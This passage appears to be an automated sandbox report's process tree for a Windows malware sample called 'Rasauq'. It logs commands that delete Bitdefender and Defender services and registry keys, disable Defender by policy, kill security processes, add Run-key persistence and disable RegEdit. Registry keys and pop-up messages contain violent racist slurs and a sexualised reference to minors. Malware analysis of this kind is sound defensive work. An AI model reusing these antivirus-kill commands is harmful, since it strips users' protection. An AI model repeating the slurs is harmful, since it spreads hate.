      4⤵
      Launches sc.exe
      PID:4448
  - - C:\Windows\system32\sc.exe
      sc delete bdredline
      4⤵
      PID:228
  - - C:\Windows\system32\sc.exe
      sc stop bdparentalservice
      4⤵
      Launches sc.exe
      PID:2160
  - - C:\Windows\system32\sc.exe
      sc delete bdparentalservice
      4⤵
      Launches sc.exe
      PID:2152
  - - C:\Windows\system32\sc.exe
      sc stop bdreinit
      4⤵
      Launches sc.exe
      PID:2740
  - - C:\Windows\system32\sc.exe
      sc delete bdreinit
      4⤵
      Launches sc.exe
      PID:5532
  - - C:\Windows\system32\sc.exe
      sc stop bdsubwiz
      4⤵
      Launches sc.exe
      PID:5848
  - - C:\Windows\system32\sc.exe
      sc delete bdsubwiz
      4⤵
      Launches sc.exe
      PID:6012
  - - C:\Windows\system32\sc.exe
      sc stop seccenter
      4⤵
      Launches sc.exe
      PID:3200
  - - C:\Windows\system32\sc.exe
      sc delete seccenter
      4⤵
      Launches sc.exe
      PID:3344
  - - C:\Windows\system32\sc.exe
      sc stop vsserv
      4⤵
      PID:3888
  - - C:\Windows\system32\sc.exe
      sc delete vsserv
      4⤵
      Launches sc.exe
      PID:5456
  - - C:\Windows\system32\sc.exe
      sc stop epssecurityservice
      4⤵
      Launches sc.exe
      PID:1168
  - - C:\Windows\system32\sc.exe
      sc delete epssecurityservice
      4⤵
      PID:5840
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f
      4⤵
      PID:2156
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f
      4⤵
      PID:1308
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f
      4⤵
      PID:3196
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f
      4⤵
      PID:3784
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f
      4⤵
      PID:5032
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f
      4⤵
      PID:3316
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f
      4⤵
      PID:5520
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f
      4⤵
      PID:5856
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f
      4⤵
      PID:724
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f
      4⤵
      PID:792
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f
      4⤵
      PID:4148
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:3692
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:4152
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:3364
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
      4⤵
      PID:2884
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
      4⤵
      PID:3928
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:4060
  - - C:\Windows\system32\sc.exe
      sc delete WinDefend
      4⤵
      Launches sc.exe
      PID:4124
  - - C:\Windows\system32\sc.exe
      sc stop SecurityHealthService
      4⤵
      PID:4056
  - - C:\Windows\system32\sc.exe
      sc delete SecurityHealthService
      4⤵
      PID:5380
  - - C:\Windows\system32\sc.exe
      sc stop Sense
      4⤵
      Launches sc.exe
      PID:4612
  - - C:\Windows\system32\sc.exe
      sc delete Sense
      4⤵
      Launches sc.exe
      PID:3164
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MsMpEng.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3228
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MpCmdRun.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2056
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM SecurityHealthSystray.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1768
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM smartscreen.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4516
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3656
  - - C:\Windows\system32\icacls.exe
      icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1160
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Program Files\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:944
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4880
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
      4⤵
      PID:6088
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f
      4⤵
      PID:4724
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
      4⤵
      PID:5140
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f
      4⤵
      PID:4644
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\notepad.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1748
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5396
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\calc.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5240
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4856
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5084
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5184
  - - C:\Windows\system32\powercfg.exe
      powercfg /hibernate off REM Disables hibernation
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:4244
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:800
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:4480
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:4756
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "Device Name"
      4⤵
      Power Settings
      Drops file in Windows directory
      Checks SCSI registry key(s)
      PID:2232
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "USB Root Hub"
      4⤵
      Power Settings
      Checks SCSI registry key(s)
      PID:1688
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f
      4⤵
      Adds Run key to start application
      PID:3752
  - - C:\Windows\system32\reg.exe
      reg add "HKCR\behead all niggers" /f
      4⤵
      Modifies registry class
      PID:292
  - - C:\Windows\system32\reg.exe
      reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f
      4⤵
      PID:4116
  - - C:\Windows\system32\reg.exe
      reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"
      4⤵
      PID:304
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f
      4⤵
      Adds Run key to start application
      PID:5440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k
      4⤵
      PID:3296
    - - C:\Windows\system32\reg.exe
        
        reg query "HKU" /s /f "Software" /k
        5⤵
        
        PID:1964
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3200
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3344
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:484
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f
      4⤵
      PID:3892
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3384
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:5512
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:948
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3196
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:3152
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2972
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Software\Rasauq on top" /f
      4⤵
      PID:356
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f
      4⤵
      PID:5540
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:5148
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:3644
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:4984
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:3464
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:1840
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f
      4⤵
      PID:3684
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3720
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:3552
  - - C:\Windows\system32\reg.exe
      reg add "Suchvorgang abgeschlossen: 20 übereinstimmende Zeichenfolge(n) gefunden.\Software\Rasauq on top" /f
      4⤵
      PID:4152
  - - C:\Windows\system32\msg.exe
      msg * /time:3 "This machine has been compromised by Rasuaq"
      4⤵
      PID:5852
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3744
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
      4⤵
      Disables RegEdit via registry modification
      PID:6116
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:480
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5028
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:436
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4716
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3028
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      Drops file in Windows directory
      Enumerates system info in registry
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:2976
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x308,0x7ff98630f208,0x7ff98630f214,0x7ff98630f220
        5⤵
        
        PID:3220
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=de --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1868,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:11
        5⤵
        
        PID:3768
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1752,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=1884 /prefetch:2
        5⤵
        
        PID:4240
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=de --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2500,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=2616 /prefetch:13
        5⤵
        
        PID:4836
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3400,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=3484 /prefetch:1
        5⤵
        
        PID:2804
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3408,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:1
        5⤵
        
        PID:2232
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4140,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=4852 /prefetch:1
        5⤵
        
        PID:3640
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4808,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5020 /prefetch:1
        5⤵
        
        PID:4124
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=5136,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=4060 /prefetch:1
        5⤵
        
        PID:3360
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=5324,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5352 /prefetch:1
        5⤵
        
        PID:5640
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5540,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:1
        5⤵
        
        PID:3924
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=5748,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:1
        5⤵
        
        PID:3236
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5900,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5924 /prefetch:1
        5⤵
        
        PID:6116
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=6048,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5728 /prefetch:1
        5⤵
        
        PID:2652
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=6224,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=6256 /prefetch:1
        5⤵
        
        PID:5448
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=6400,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=6052 /prefetch:1
        5⤵
        
        PID:3636
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6576,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=6580 /prefetch:1
        5⤵
        
        PID:4988
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=6752,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:1
        5⤵
        
        PID:5980
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=6904,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=6588 /prefetch:1
        5⤵
        
        PID:2248
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=7060,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=7088 /prefetch:1
        5⤵
        
        PID:5560
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=7284,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=7288 /prefetch:1
        5⤵
        
        PID:4044
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=7452,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=7460 /prefetch:1
        5⤵
        
        PID:3840
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=6912,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=7412 /prefetch:1
        5⤵
        
        PID:2896
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=7788,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=7796 /prefetch:1
        5⤵
        
        PID:1876
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=8124,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=8132 /prefetch:1
        5⤵
        
        PID:5076
